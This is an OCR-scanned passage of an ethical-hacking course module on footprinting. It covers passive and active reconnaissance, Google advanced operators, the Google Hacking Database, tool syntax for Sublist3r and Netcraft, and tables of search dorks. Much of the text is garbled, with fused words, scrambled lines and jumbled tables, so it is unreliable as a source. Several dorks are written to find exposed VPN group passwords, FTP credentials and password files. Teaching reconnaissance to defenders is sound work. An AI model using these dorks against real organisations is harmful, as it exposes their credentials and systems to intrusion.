ITinfrastructurewith their consent. Footprinting,
hacking.
about a target,i s thefirststepi n ethical
ofa target
wherea n attackertries to gather
information
phase
Thisstepacts as a preparatory forthe
attacker,
as as easily into
whoneedsto gather much
thetargetnetwork
informationpossibleto findwaysto intrude
youwith footprinting,
Thissectionaims to familiarize whyitis necessary,
andits objectives,
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is Footprinting?
Footpinting
network
‘target any
t o identify2
is the fst stepof atackon i n which
informationsystems
various ways to intade int thesystem
an attacker
collet information
about
typesoft
Obtained
in | of Information Tootprinting Objective Footprinting
Whatis Footprinting?
essentialaspectof footprinting
‘An is identifying
the level of risk associatedwith the
organization’s
publiclyaccessibleinformation. thefirst stepi n ethicalhacking,
Footprinting,
of
footprinting, a
refersto the processcollectinginformationabout targetnetworkanditsenvironment. Using
you can find a numberof opportunities to penetrate and assessthe target
organization's
network.
After you completethe footprinting
process i n a methodological
manner, you will obtainthe
blueprintofthesecurityprofile Here,theterm “blueprint―
ofthe targetorganization. refersto
profile
the unique system of thetargetorganization acquired
byfootprinting,
is no single
‘There methodology for footprinting,as informationcan be tracedi n a numberof
‘Types
these
exploiting vulnerabilities
of Footprinting
can be categorized
Footprinting into passivefootprinting
andactive footprinting,
‘=
PassiveFootprinting
Passivefootprinting involvesgatheringinformationabout the targetwithout direct
interaction. It is mainly usefulwhenthe informationgatheringactivities are not to be
detectedbythe target.Performing passivefootprinting difficult,
is technically as active
traffic is not sent to the target froma hostor anonymous hostsor services
organization
ical andCountermensores
Mackin ©by E-Comel
Copyright
over the Internet.Wecan onlycollectarchivedandstoredinformation
aboutthetarget
usingsearchengines,socialnetworking
sites,andso on.
Passivefootprinting
techniques
include
© Finding through
information searchengines
Finding Domains(TLDs)
the Top-level of a targetthrough
and sub-domains web
Collecting
location on the targetthrough
information webservices
Performing
people using
search networking andpeople
social sites searchservices
Gathering
financialinformationaboutthe targetthrough financialservices
Gathering
infrastructuredetailsof the through
targetorganization jobsites
Collecting
informationthrough
deep
anddarkweb footprinting
theoperating
Determining i n use bythe target
systems organization
Performing
competitive
intelligence
Monitoring
the targetusingalert services
Gathering
informationusinggroups,forums, blogs,
and NNTPUsenetnewsgroups
Collecting
informationthrough
socialengineeringon socialnetworking
sites
information
Extracting aboutthetargetusingInternetarchives
Gathering
informationusingbusiness profile
sites
Monitoring
websitetrafficof the target
©. Tracking
of
theonlinereputationthe target
ActiveFootprinting
Active footprinting involves gathering informationabout the target with direct
interaction. In active footprinting,
the targetmay recognize the ongoing information
gathering process,as we overtly interact with the targetnetwork.Activefootprinting
requires more preparation thanpassivefootprinting,as it may leavetracesthat may alert
the
target organization,
footprinting
Active techniques
include
© Querying
publishedname servers of the target,
Searching
for digital
files
websitelinksandgathering
Extracting wordlistsfromthe targetwebsite
metadata
Extracting ofpublisheddocuments andfiles
websiteinformation
Gathering usingweb spidering andmirroringtools,
Gathering
informationthrough tracking
email
ical andCountermensores
Mackin ©by E-Comel
Copyright
Harvesting
email
Whois
lookup
Perforrning
lists
Extracting
DNSinformation
Performing
traceroute analysis
Performing
socialengineering
Information Obtained in Footprinting
The major objectivesof footprinting
include collecting
the network information,
system
Information,
and organizational
informationof the target.Byconducting
footprinting
across
differentnetworklevels,you can gaininformationsuchas networkblacks, specific
IP addresses,
employee and so on. Suchinformation
details, can helpattackersin gainingaccessto sensitive
dataor performingvarious attackson the target
network.
*
Information:Suchinformationabout an organization
Organization is availablefrom its
youcan querythe target’s
website.In addition,
andobtainvaluableinformation.
domain
nameWhois
againstthe database
Theinformation
collected
includes:
details (employee
Employee designations,
names, contact addresses, and work
experience)
Addresses andmobile/telephone
numbers
Branchandlocation details
Partnersof the organization
Weblinksto othercompany-related
sites
Background
of the organization
Web
technologies
Newsarticles,
pressreleases,
andrelateddocuments
Legal
documents
relatedto the organization
Patentsandtrademarks relatedto the organization
Attackerscan access organizational
informationanduse suchinformationto identify key
personnel andlaunchsocialengineeringattacksto extractsensitivedataaboutthe entity.
Network Information: You can gathernetwork information by performing
Whois
analysis,
database andso on,
trace routing,
Theinformation
collectedincludes:
Domainandsub-domains
Networkblocks
Networktopology,
trustedrouters,andfirewalls
ical andCountermensores
Mackin ©by E-Comel
Copyright
IPaddresses
ofthereachable
systems
Whois records
DNSrecordsandrelatedinformation
System Information: You can gather systeminformation byperforming network
footprinting,
DNSfootprinting,
websitefootprinting,
emailfootprinting,
andso on.
Theinformationcollectedincludes:
Web server05
>
©
ofweb
Location
Publiclyemail
servers
available addresses
© Usernames,
passwords,
andso on,
Objectives
of Footprinting
To builda hacking attackers
strategy, needto gather
informationaboutthetargetorganization's
network.They then use suchinformationto locatethe easiest way to break through the
organization's
security
it easyto gather
process.
perimeter.
informationaboutthe target methodolog
thefootprinting
Asmentionedpreviously,
organization;
this plays
makes
a vital role i n the hacking
helps
Footprinting to
=
Know Security Posture:Performing footprinting
on the targetorganization
gives the
complete profileof the organization's posture.Hackerscan then analyze
security the
reportto identifyloopholesin the security
postureof the targetorganization
andbuild a
hacking
planaccordingly.
Reduce FocusArea: Byusinga combinationof toolsandtechniques, attackerscan take
unknownentity(forexample,
‘an XYZOrganization)andreduceit to a specificrange of
domainnames,networkblocks,
to the Internet,
andindividualIP addresses
as well as manyotherdetailspertaining
ofsystems
to its securitydirectly
connected
posture.
Identify
Vulnerabilities:A detailedfootprint
provides
maximum informationaboutthe
It allowsthe attackerto identify
targetorganization. vulnerabilities
i n the targetsystems
exploits.
to selectappropriate Attackerscan buildtheir own informationdatabaseabout
the securityweaknesses of the targetorganization.Sucha database c an thenhelpin
identifying
theweakestlink i n the organization's
security perimeter.
the Combining
footprinting
attacker techniques
Draw NetworkMap:
of tools
the Tracert
target
presence. Specficially,network
to create diagrammatic
with suchas
representations organization's
allows
ical andCountermensores
Mackin ©by E-Comel
Copyright
Footprinting Threats
Attackersperformfootprinting
as the first step
of any attackon informationsystems.In this
phase, attemptto collectvaluablesystem-level
attackers informationsuchas account details,
operatingsystemandothersoftwareversions, server details,
names,databaseschema and so
on, whichwill be usefulin the hacking
process.
Thefollowing threatsmadepossible
are assorted through
footprinting:
Social Engineering:Withoutusingany intrusion methods,hackersdirectly
andindirectly
through
collect information persuasionandother means. Hackersgather crucial
informationfromwilling
employeeswho are unaware of the hackers’
intent.
SystemandNetworkAttacks:Footprinting enablesa n attackerto perform
systemand
network attacks.Thus, attackerscan gather informationrelatedto the target
organization's
systemconfiguration,
the operating
systemrunningon the machine,and
0 on, attackerscan findvulnerabilities
this information,
Using in the targetsystem and
then exploit
suchvulnerabilities.They
c an then takecontrolof a targetsystem or the
network,
entire
Information Information
Leakage: leakage
posesa threatto anyorganization.
If sensitive
of
on the information
or
fallsinto the handsof attackers,
information an entity
alternatively
use it formonetary
theycan mount an attackbased
benefit,
PrivacyLoss:Through footprinting,
hackersc an accessthe systemsandnetworksof the
organization and even escalatethe privileges resulting
up to adminlevels, i n the lossof
Espionage:
as
a
privacyfor the organization wholeandfor its individualpersonnel.
Corporate Corporate espionage is a centralthreat to organizations, as
oftenaim to attemptto secure sensitivedatathrough
competitors footprinting,Through
this approach,
competitors can launchsimilarproducts i n the market,
alter prices, and
generally
underminethemarketposition of a targetorganization.
BusinessLoss:Footprintingcan havea majoreffecton organizations suchas online
and other e-commerce websitesas well as banking
businesses and finance-related
Billionsofdollarsa re losteveryyeardueto malicious
businesses. attacksbyhackers.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
ootprintingConcepts
Feotprinting
Tools
Footprinting
Countermessures
Footprinting
Methodology
Nowthatyou are familiarwith footprintingconcepts and potentialthreats, we will discuss
the
footprintingmethodology. The footprinting methodology is a procedure for collecting
informationabouta targetorganization fromall availablesources. It involvesgathering
suchas URLs,
informationabout a targetorganization, locations,
establishment details,number
of employees, specificrange of domain names, contact information, andotherrelated
information.Attackerscollectthisinformationfrom publiclyaccessiblesources suchas search
techniques
networking
engines,social sites,
Whois
databases, the andso on. Thissectiondiscusses common
usedto collectinformationaboutthe targetorganization fromdifferentsources,
Footprinting
techniques:
+
through
search
engines,
Footprinting
+
through
web
services
Footprinting
Footprinting
+
Email
Whois
footprinting
footprinting
DNS
Network
footprinting
footprinting
Footprinting
through
socialengineering
ical andCountermensores
Mackin ©by E-Comel
Copyright
Footprinting SearchEngines
through
(@Atachers
use search
enginesto extractinformation
othertypesofadvanced attacks
sjstem
a
about target,
such as employed
technology
platforms,
(arse
Ip
GoogleBingYaroo! Aol. sates °
@®
can complex
(2 Auchers ue advancedsearchoperators
totingfier andsor spec information
avaiable
withthesesearchenginesand
aboutthetarget
create queries
(©Search
ate
alstoater
of accesible
information
engines used fad
provide resources,
eg. sources
to findmajr jb portals
type "topob portals" tha
publ
cital information
youean
aboutthetargetorganization
throughSearchEngines
Footprinting
Search enginesare themain sourcesof key information abouta targetorganization.
Theyplaya
major role i n extractingcriticaldetailsabout a targetfrom the Internet.Searchengines use
automated software, i.., crawlers,to continuously scan active websites
andaddtheretrieved
resultsi n the searchengineindexthat is further storedi n a massive database.Whena user
queriesthesearch engineindex,it returns a listofSearch Engine Results
Pages (SERPs).
These
resultsincludeweb pages,videos, images,and many differentfile typesrankedanddisplayed
according to theirrelevance.Many search enginescan extracttarget information
organization
such as technology platforms,employee details,loginpages,intranet portals, contact
information, andso on. Theinformationhelps the attackeri n performing
socialengineeringand
othertypesof advancedsystem attacks.
A Googlesearchcouldrevealsubmissions to forumsbysecurity
personnel,
disclosing
thebrands
of firewallsor antivirus softwareusedbythe target.Thisinformation
helps
the attackeri n
identifying
vulnerabilitiesi n suchsecurity
controls.
For example,
Microsoft.Browsing
an
consider organization, perhaps
searchengine and pressEnter;this will display
the resultsoften provides
Microsoft.TypeMicrosofti n theSearchboxof
the resultscontaining information
criticalinformationsuchas physical
about
location,
a
contact addresses,services offered,number of employees, andso on, whichmayproveto bea
valuablesource for hacking.
Examples of majorsearchenginesincludeGoogle, Bing, Yahoo,Ask,Aol,Baidu, WolframAlpha,
andDuckDuckGo,
‘Attackers
can use advancedsearchoperators availablewith thesesearchenginesand create
complex informationregarding
queries to find,filter,and sort specific the target.
Searchengines
ical andCountermensores
Mackin ©by E-Comel
Copyright
are alsousedto
“top
find
jobportals―
organization,
other
sources
publicly
accessibleyou
of
to find major jobportals
information.
that provide
Forexample, can type
criticalinformationabout the target
ical andCountermensores
Mackin ©by E-Comel
Copyright
Footprinting AdvancedGoogle
Using Hacking
Techniques
(©.
Goople hacking eer totheus ofadvanced
sensitiveox hiddeninformationthat helps
Google earchoperators
attackers i nd vera
foreeatngcomplex
targets
search
queries eatrat
to
(ene Depth
web sap torent Googe (ntl Revs the ret tone wae
Se ‘Geta abe seachyeni
ink]
tothe
tsa poe tat hv tls pte oe ais
tia
tet
ots
{in ame
hat
Googe
Presets nomaton as Aut ests tee
Footprinting
UsingAdvanced Google
HackingTechniques
Google refersto the use of advancedGoogle
hacking searchoperators complex
for creating
searchqueriesto extract sensitive or hiddeninformation.Theaccessed informationis thenused
byattackersto findvulnerabletargets.Footprinting usingadvancedGoogle hacking techniques
involveslocating specificstrings of text within searchresultsusingadvancedoperators i n the
Google search engine.
AdvancedGoogle hacking refersto the art of creating complex searchenginequeries.Queries
can retrieve valuabledataabout a targetcompany fram Google searchresults.Through Google
hacking,
the Google
operators
an
attacker
tries
Hacking
to find websites
Database
helpi n finding
(GHDB),
the required
that are vulnerableto exploitation.
a databaseof queries,to identify
text andavoiding
Attackerscan use
sensitive data.Google
irrelevantdata.UsingadvancedGoogle
operators, attackersc an locatespecific
applications.
search
stringsoftext suchas
Whena query without advancedsearchoperatorsis specified,
terms in anypartofthewebpage, including thetitle,text, URL,digital
specific
versions
ofvulnerableweb
Google traces the
files,andso on. To
confinea search, Google offersadvancedsearchoperators. Thesesearchoperators helpto
narrow downthe search queryandobtainthemost relevantandaccurate output,
Thesyntax to use an advanced searchoperatoris as follows:operator:search_term
Note:Donot enter anyspaces
betweenthe operator
andthe query.
SomepopularGoogle
advanced
search include:
operators
Source:http://www.googleguide.com
‘=
restricts searchresultsto the specified
site: Thisoperator site or domain.
For example,
the [games query givesinformation
site: www.certifiedhacker.com] on
gamesfromthecertifiedhacker site
the
title.
example,
For the[malware detectionintitle:help]
queryreturns only
pagesthathavethe
term “help―
in the title,andthe terms “malware― anywhere
and“detection― withinthe
page.
Thisoperatorrestricts resultsto onlythe pagescontaining
inanchor: the queryterms
specified
i n the anchort ext on linksto the page.
For example,
(on linksto
the [Anti-virus
“Anti-virus.―
inanchor:Norton] query returns onlypageswith
the word “Norton―
the pagescontaining andthe pagecontaining
the word anchor
text
allinanchor: restricts resultsto only
Thisoperator the pagescontaining
all queryterms
specified
in theanchortext on linksto the pages.
Forexample, the [allinanchor:
bestcloudservice provider] query returns onlypages for
and“provider.―contains
whichthe anchortext on linksto the pages the words“best,―
“cloud,―
“service,―
ofoperator
Google'spageof
cache:This displays cachedversion of a web instead the current
version the webpage.
Forexample, [cache:www.eff.org]
will showGoogle’s
cachedversion of the Electronic
Frontier Foundationhomepage.
link:Thisoperator or pagesthatcontain linksto the specified
websites
searches website
or page
For example,
[link:www.googleguide.com]
findspagesthat pointto Google Guide’s
home
page.
Note: According
regular
to Google’s
keyword
search.―
documentation,
“you
a
cannot combine link:searchwith
a
ical andCountermensores
Mackin ©by E-Comel
Copyright
Alsonote thatwhenyou combinelink:withanotheradvanced Google
operator, maynot
return all the pagesthat match.
displays
related:Thisoperator websitesthat are similaror relatedto the URLspecified.
Forexample,[related:www.microsoft.com] provides
the Google
search
engineresults
page withwebsitessimilarto microsoft.com.
findsinformationfor the specified
info: Thisoperator web page.
Forexample,{info:gothotel.com]
provides aboutthe nationalhoteldirectory
information
GotHotel.comhomepage.
location: findsinformationfor a specific
This operator location,
For example,
[location:
4 seasons restaurant]
will giveyou resultsbasedon the term “4
seasonsrestaurant.―
Filetype:
Thisoperator
allowsyou to searchfor resultsbasedon a file extension.
[jasmine]will provide
For Example, jpg filesbasedon jasmine.
What can a Hacker do with Google
Hacking?
attackercan create complex
‘An searchengine queries to filter largeamounts of searchresultsto
obtaininformation relatedto computer security.Theattacker usesGoogle operatorsthat help
locatespecificstringsof text within the searchresults.Thus, the attackercan not onlydetect
websitesand webservers that are vulnerable to exploitation butalsolocateprivate,sensitive
informationaboutothers, suchascreditcardnumbers, socialsecuritynumbers,
passwords,and
attackerstryto launchvarious possible
so on. Once a vulnerablesite is identified, attacks,
such
as bufferoverflowandSQL whichcompromise
injection, informationsecurity.
Examples
of sensitive informationon public
servers that an attackerc an extract with the help
of
Google
Hacking (GHDB)
Database queriesinclude:
+
Errormessagesthat contain sensitive information
+
passwords
Filescontaining
+
Sensitive
Pages
directories
logon
containing portals
Pages
containing
configurations or
networkvulnerability firewalllogs,
data,suchas IDS, and
ical andCountermensores
Mackin ©by E-Comel
Copyright
Example: AdvanceOperatorsyntax (intitle:intranet
Use Google inurl: intranet
+intext: "human resources―) to find sensitive informationabout a target
organizationand
Attackersuse the gathered
its employees, informationto perform socialengineeringattacks.
belowshowsa Google
Thescreenshot searchengine resultspage displaying
the resultsfor the
querymentionedabove.
HumanResources
|
MCADIntranet
HR |
Intranet Software Claromentis
| -
HumanResources
intranet Universityof Hawall
2.1:
Figure
engine Operator
Search resusfor givenGoogle
Advance syntax
ical andCountermensores
Mackin ©by E-Comel
Copyright
Google Database
Hacking
© T he
Google
(GHB)Hacking
an
Database
authoritative
of
Source forquerying
theever
reach he Google
‘widening
‘tacks d orks
use Googe in
to entact sensitive
operators
information
aboutthelrtarget
login
p ages, and
w ebsites
Google Database
Hacking
Source:https://www.exploit-db.com
Google
‘The Hacking
Database (GHDB) is an authoritativesource for queryingthe ever-widening
scopeof the Googlesearchengine.In the GHDB, you will findsearchterms forfilescontaining
usernames,vulnerableservers, andeven files containing passwords. TheExploit Databaseis a
CommonVulnerabilities and Exposures (CVE) compliant archive of publicexploits and
correspondingvulnerablesoftware,developed for use bypenetration testers and vulnerability
researchers.
UsingGHDBdorks,attackerscan rapidlyidentifyall the publicly
available exploits
and
vulnerabilities
target
organization’s
infrastructure.
advancedsearch Attackers
of the
Google
dorks
Google
operators
sensitive files,
servers, error messages,
IT
to extract sensitive information
use in
aboutthe target,suchas vulnerable
loginpages,andwebsites.
Google Hacking DatabaseCategories:
+
Footholds FilesContaining Infor
Juicy
+
FilesContaining
Usernames FilesContaining
Passwords
+
SensitiveDirectories SensitiveOnlineShopping
Info
WebServer Detection Networkor Vulnerability
Data
Vulnerable
Files agesContainingLoginortals
P
VulnerableServers VariousOnlineDevices
ErrorMessages Advisories
andVulnerabilities
ical andCountermensores
Mackin ©by E-Comel
Copyright
Google
Hacking
Database
2
Module 108
Page ical andountermessre
Mackin Coy recounet
Sescipton
Goole
ork
Thefollowing hacking
tablessummarize someofthe Google or Google
operators dorksto obtain
specific
informationrelatedto VoIPandVPNfootprinting,
respectively.
Google queries
search for VoIP footprinting
Google
Dork Description
intitle:"Login
Page" Adapter Pages
intext:"Phone
portals,
login
containing
Contguretion
Utty
_|
configuration
inttle:"D-Link
SPA
VoIPRouter""Welcom
Findsthe Linksys
inurk/voiee/advanced/intitleinksys
page
VoIProuter configuration
Pages D-Linkloginportals.
containing
intitle:asterisk.management
portal
web-
portal
Looksfor the Asteriskmanagement
inte’
Configuration’
inttle:"SPASO4G Finds Configuration
CiscoSPASO4G
IPphones
Utilityfor
ical andCountermensores
Mackin ©by E-Comel
Copyright
Findsconfiguration
pagesfor onlineVoIP
Intitle:"Sipura.SPA.Configuration"
-.pdf devices
intitle:asterisk portalweb:
management
intitle:"Iogin’
inurl:8080 intext:―UserLogin―
FindstheAsterisk
webmanagement
portal
“English―
VoIP loginportals
forVolPfootriting
‘queries
Google queriesforVPNfootprinting
search
Google
Dork Description
CiscoVPNfileswith Group for remote
Passwords
"cisco""GroupPwd"
filetype:pef
VPNclientpasswords
FindsCisco (encrypted
but
"{main}"
"enc_GroupPwd="
ext:txt
cracked)
easily
of―intext:vpn
"Config" intitle:"Index Directorywith keys
of VPNservers
filetype:pef
vpnORGroup Findspublicly
accessible.pcf
usedbyVPN
clients
vpnssi
Retrievesloginportals vpnssl
containing
companies’
access
inttle:"SSLVPNService"+ intext:"Your
system administratorprovided the
Ciscoasa login
Finds webpages
following informationto helpunderstand
and remedy the security
conditions:
2.2:Google
Table search
queriesfor
VPN
footprinting
ical andCountermensores
Mackin ©by E-Comel
Copyright
Other Techniques
for Footprinting
through
SearchEngines
{nformaon
aout helrg suchas mage
eos lg and new ces fom
ent
SETechniques FootprintingthroughEdEngines
Other for Search
=
Gathering
Information Google
Using Advanced
Search, and
Search,
AdvancedImage
Search
Reverse Image
‘An cannot always
attacker gather easily
information froman information-rich
site using
only@ normalsearchbox. A complicated
searchinvolvesa numberof interrelated
conditions,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Google's featurehelps
Advancedsearch an attackerto perform websearching,
complex
With Google AdvancedSearchandAdvancedImage Search,one can searchthe web
more precisely and accurately.
Youcan use thesesearchfeatures to achieve the same
precision as that achievedusing the advancedoperators but without typingor
remembering theoperators.Using Google’s
Advanced Searchoption,you can findsites
that may linkbackto the targetorganization’s
website.Thishelps to extract information
suchas partners,
Google
vendors,
AdvancedImage
andso on.
clients,
otherofthe
and affiliations targetwebsite.
Searchto acquireimagesof the target,i ts location,
Youcan use
employees,
To perform
Google,
Settings
an advanced
of
searchi n click at thebottom-right
home page, and then chooseAdvancedsearch i n the menu or directlytype
theGoogle
anyadvanced
https./Avww google.com _search i n the addressbar. Advanced searchallows
of
you to specify number criteria that the searchmust match,as this patternbuilds
cn the searchboxpatternbyadding more search options.To dothis,you choosea field
Then,enter the stringyou want to searchfor i n the field's text box andclickon the
AdvancedSearch button. Bydefault,various valuesare joined togetherwith "and"
{meaning
togetheralof
them for needto match)
with "or" (meaning
except sets,blocks,
anyof themcan match).
andformats,whichare joined
ical andCountermensores
Mackin ©by E-Comel
Copyright
Advance Search
2.3:Gooale
Figure
To perform an advanced image _—search_—
in. Google, _type
https./vww
google.com/advanced_image_search
i n the address bar.Advancedimage
searchallowsyouto tweakyourimagesearch i n a number ofways.Youcan searchbased
o n imagecolor,domain, file type,size,keyword,andso on. Todothis,you choosea field
Then, enter the stringyou want to search for i n thefield'stext boxand clickon the
‘AdvancedSearchbutton.
ical andCountermensores
Mackin ©by E-Comel
Copyright
To perform
Figure
2.4: Advance
Google Search
Image
a reverse imagesearchin Google, typehttps://www.google.com/imghp in
the addressbar. Reverse imagesearchallowsyou to use a n imageas a searchquery.You
can upload an imageor pastethe URLof the imagein the reverse imagesearchengine.
The
search
engine
verifies allonline
the searchengineindexanddisplays
ical andCountermensores
Mackin ©by E-Comel
Copyright
Google
Seachusing
Figure25:Reverse Image Google
Gathering
InformationfromVideoSearchEngines
Video search enginesare Internet-basedsearch enginesthat crawlthewebforvideo
content. Thesevideosearchengines either provide the functionality
of uploading
and
hosting videocontent on their own webservers or parsevideocontentthat is hosted
externally.Thevideocontent obtainedfromvideosearchengines is of highvalue,as it
be usedfor gathering
‘can informationaboutthe target.Video searchenginessuchas
YouTube,
Google
videos,
Yahoo
videos,
Bing
videos for and
content basedon theformattypeandduration,
allowattackersto search video
Microsoft
26: Screenshot
Figure ofYouTube search
showing cesultsforMicrosoft
ical andCountermensores
Mackin ©by E-Comel
Copyright
Aftersearching
forvideosrelatedto the targetusingvideo search
engines,a n attacker
can furtheranalyze hiddeninformationsuchas the time/date
thevideocontent to gather
andthumbnail
of
the
video.
video
andVideoReverser.com, tools
analysis
such
as
Using YouTube EZGif,
DataViewer,
an attackercan reverse a videoor convert a videointo text and
otherformatsto extract criticalinformationaboutthetarget
YoutubeDataViewer
SSTEEE)
Figure2.7:
Screenshot
ofYouTube showing
DataViewer ideo analyse
result
Gathering
Informationfrom Meta Search Engines
Meta searchenginesare a differenttypeof searchenginesthat use othersearchengines
(Google,
time
span.
Bing,Ask.com,etc.) toproduce
Thesesearchenginesdo not results
theirown
have
their
the inputsfromthe users and simultaneously
fromthe Internetin averyshort
indexes;
instead,
they
own search take
sendout the queriesto the third-party
searchenginesto obtainthe results.Oncesufficientresultsare gathered, theyare ranked
according andpresented
to their relevance to the user throughtheweb interface. Meta
searchenginesalsoincludea functionality whereby identicalsearchresultsare filtered
‘utso thatif the user searches thesame
the same queryagain,then it will not display
ical andCountermensores
Mackin ©by E-Comel
Copyright
resultstwice. A meta search engineis advantageouscompared to simple
search
engines,
asit can retrieve more resultswith the same amount of effort.
Usingmeta searchengines,suchas Startpage, MetaGer,andeTools.ch,attackerscan
send multiplesearchqueriesto severalsearchenginessimultaneously and gather
detailedinformationsuchas informationfrom shopping
substantially sites (Amazon,
eBay,etc.),
images,
videos,
news,
articles
different
sources.
blogs, and
searchenginesalso provide
address.
from Further,
privacy to the searchengineuser byhiding
meta
the user'sIP
Startpage com
Figure
tS
2.8:Sreenshot
of MetaSearch StartPage.com
Engine search
showing resus for Twiter
Gathering
Informationfrom FTPSearchEngines
FTP search enginesare used to search for fileslocatedo n FTP servers that contain
valuable informationabout the targetorganization. Manyindustries,institutions,
companies,
that are sharedamongtheir employees.
project.org)
A special
can beusedto access the FTPaccounts;
file
anduniversities use FTPservers to storelarge archivesandothersoftware
clientsuchas Filezilla(hetps://filezilla-
it alsosupportsfunctionalitiessuch
as uploading, downloading, and renamingfiles. Although FTPservers are usually
protected with passwords,manyservers are left unsecured andcan beaccessed through
webbrowsers directly
Using
FTPsearchenginessuchas NAPALMFTPIndexer, GlobalFTPSearchEngine, and
FreewareWeb attackerscan searchfor criticalfilesand directories
FTP File Search,
ical andCountermensores
Mackin ©by E-Comel
Copyright
valuableinformation
containing suchas business tax documents,
strategies, employee's
personal
records,
financialrecords,
licensedsoftware,
andotherconfidentialinformation.
Listedbelow are some of the important advancedGoogle
searchqueriesto find FTP
servers:
GoogleDork Description
| pont
intext:.tpconfig
inurkgithub.com
typermilinurl:ftp
extpaf|ps
issues
| ReturnsSFTP/FTP
server
credentials
Returnssensitivedirectorieson FTP
on Github
[inon:pue
[intle*index
inttendex of
|―[
ers pret cotigvatin
servers
attackers
queries to findFTPservers
can use the NAPALMFTP Indexer
onlinetool to
searchforcriticalfilesanddocumentsrelatedto the targetdomain.
cartons ZICASAS ya
Figure
2.9;Sereenshotof Engine
FTPSearch NAPALM
FTP
Indexer
ical
showing
Mackin
search
resultsforMicrosoft
Sereensho
Figure 2.10: of Shodan
ical
dev
showingSearch resusfor SCADA
andCountermensores
Mackin ©by E-Comel
Copyright
andReonnaiance
Feotgrting
Services
Figure
211:Screenshot showing
ofShodan openportsandservices
@
of SCADA
system
Modul
2 120
Page ical MackinandCountermensores
©
Copyright
by E-Comel
a
Finding Company's
Top-Level
Domains(TLDs)
and Sub-domains
j
C/E
‘domains
ya and
misfforam
nteraftcom
throughWeb Services
Footprinting
Webservicessuchas people
search sensitive information
servicescan provide aboutthetarget.
may alsoprovide
Internet archives sensitive informationthat hasbeenremovedfromtheWorld
WideWeb(WWW). sites,people
Socialnetworking searchservices,alertingservices,financial
andjobsites provide
services, informationabouta targetsuchas infrastructuredetails,physical
andemployee
location, details.Moreover,groups,forums, andblogs can helpattackers in
gatheringsensitive informationabout a target,suchas public networkinformation,system
strategy
system
and personal
information,
attacks.
information.
Using thisinformation,
to breakinto the targetorganization’s may
an attacker build a hacking
networkand carryout other typesof advanced
Finding
footprinting
a Company's
through
Domains(TLDs)
Top-Level
gathering
Shodan,
andSub-domains
competitiveintelligence,
etc.
company’s
‘A top-level domains(TLDs)andsub-domains can providea large amount of useful
informationto an attacker.Apublicwebsiteis designed to showthe presence of an organization
on the Internet.It is available
forfreepublic access. It is designed
to attract customers and
partners.It maycontain informationsuchas organizational history,
services and products,and
contact information, Thetargetorganization’s
externalURLcan be locatedwith the helpof
searchengines
such
as
Google
and Bing.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Google
‘an
GresDomain
Names
Owned
by Meron
Meroson
acquired
Great
Ten
Names
Owned
Domain by Microsof-N amePros
TenGreat Domaln
Names
Ouned byMicosof- NamePros
2:12:Google
Figure search results
engineshowing fr givensyntax
The sub-domainis availableto onlya few people. Thesepersonsmay be employees of an
organization or members of a department.
In manyorganizations, websiteadministrators
create
sub-domains to test new technologies beforedeploying themon the main website.Generally,
thesesub-domains are i n the testing
stageandare insecure;hence, theyare more vulnerableto
various exploitations. Sub-domains provideinsights
into the different
departments andbusiness
Units i n an organization. Identifying
suchsub-domains may revealcriticalinformationregarding
the target,suchas the source codeof the websiteand documents on thewebserver. Access
restrictionscan beapplied basedon the IPaddress,domainor subnet, username,andpassword
common functions
helps
Thesub-domain
Most
to accesstheprivate
Therefore,
formatsfor sub-domains.
of an organization. organizations
a hackerwho knowsthe externalURLof 2
use
company
the
sub-domain
Netcraft. or
by
using
a
can oftendiscover throughtrialanderror, service such
as
ical andCountermensores
Mackin ©by E-Comel
Copyright
ThirdParty
Disclosures
MicrosoftDevelope
LineToolsFor Developers
WindowsCommand TheVisualStudioBlog
-
Toolsto SearchCompany's
Sub-domains
Netcraft
Source:https://www.netcraft.com
Netcraft provides services, including
Internet security anti-fraud and anti-phishing
services,
application
testing, analyze
market
systems,
servers, operating
andPCIscanning.They
hosting
providers
also the shareofweb
andSSLcertificateauthorities,
andother
of
the
parameters Internet.
shownin the screenshotbelow,attackerscan
‘As use Netcraft to obtain all the sub-
domainsrelatedto the target
domain.
ical andCountermensores
Mackin ©by E-Comel
Copyright
_Mlercrart
*.microsoft.com
Hostnamesmatching
> Qsearch
another
with
pattern?
First 500 results (showing
41to 60)
Sublist3r
Figure2.14:
of
ScreenshotNetcraftdisplaying
subdomains
of microsoft.com
Source:https://github.com
Sublist3r
is a Python
scriptdesigned of websitesusing
to enumerate the subdomains
COSINT.
it
It
helps enables
youto enumerate subdomains across
testers and bughuntersi n collecting
penetration
the domaintheyare targeting.
multiple
once.
sourcesat
andgathering
It enumerates subdomains
Further,
subdomains
for
usingmanysearchengines
suchas Google, Yahoo, Bing,Baidu, and Ask,It also enumerates subdomains
using
Netcraft, VirusTotal,
ThreatCrowd, DNSdumpster, andReverseDNS.
Syntax:
sublist3r
THREADS]
[-d DOMAIN][-b BRUTEFORCE]
[-e ENGINES][-o OUTPUT]
[-p PORTS][-v
VERBOSE
[-t
2
Module 126
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Short
| |
Form Long
Form
domain Domain name
of
Description
to enumerate subdomains
| bruteforce Enablethesubbrutebruteforcemodule
ports
_|
Scanthe foundsubdomains
~verbose Enablethe verbose
specific
against
modeanddisplay
TCPports
resultsi n realtime
| Specifyof
threads
to
-threads Number
comma-separated
engines a
use forsubbrute
bruteforce
listof searchengines
~help
message
Showthe help
Table
andexit
2.4Sublist options withdesrption
Examples
1:
‘As
helps
attackers of
shownin the screenshot,
Sublist3r
a targetcompanyfrommultiple
sourcesat the same time,
in thesubdomains
enumerating
Screenshot
Figure2.35: ofSublist of google
dlplaying sub-domains com
ical andCountermensores
Mackin ©by E-Comel
Copyright
Examples
2:
Sublist3r
attackers
specific enumerating
subdomains
alsohelps
portopen, with
in the of a targetcompany a
Figure2.16:
Pentest-Tools
Sublistof
Screenshot
of displaying
FindSubdomains
sub-domains
google.com
withpor 80open
Source:https://pentest-tools.com
Pentest-Tools
FindSubdomainsis an online tool usedfor discovering
subdomains
and
their IPaddresses,
including
networkinformationandtheirHTTPservers.
showni n the screenshot,
‘As attackerssearchfor sub-domains
relatedto microsoft.com
addresses,
titles
information
to obtaincritical
about the targetcompanydomain,
servers used,
systems,
operating technology as
such sub-domains,
web platform,
used,
IP
and page
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure2.17
Screenshot playingsub-domain
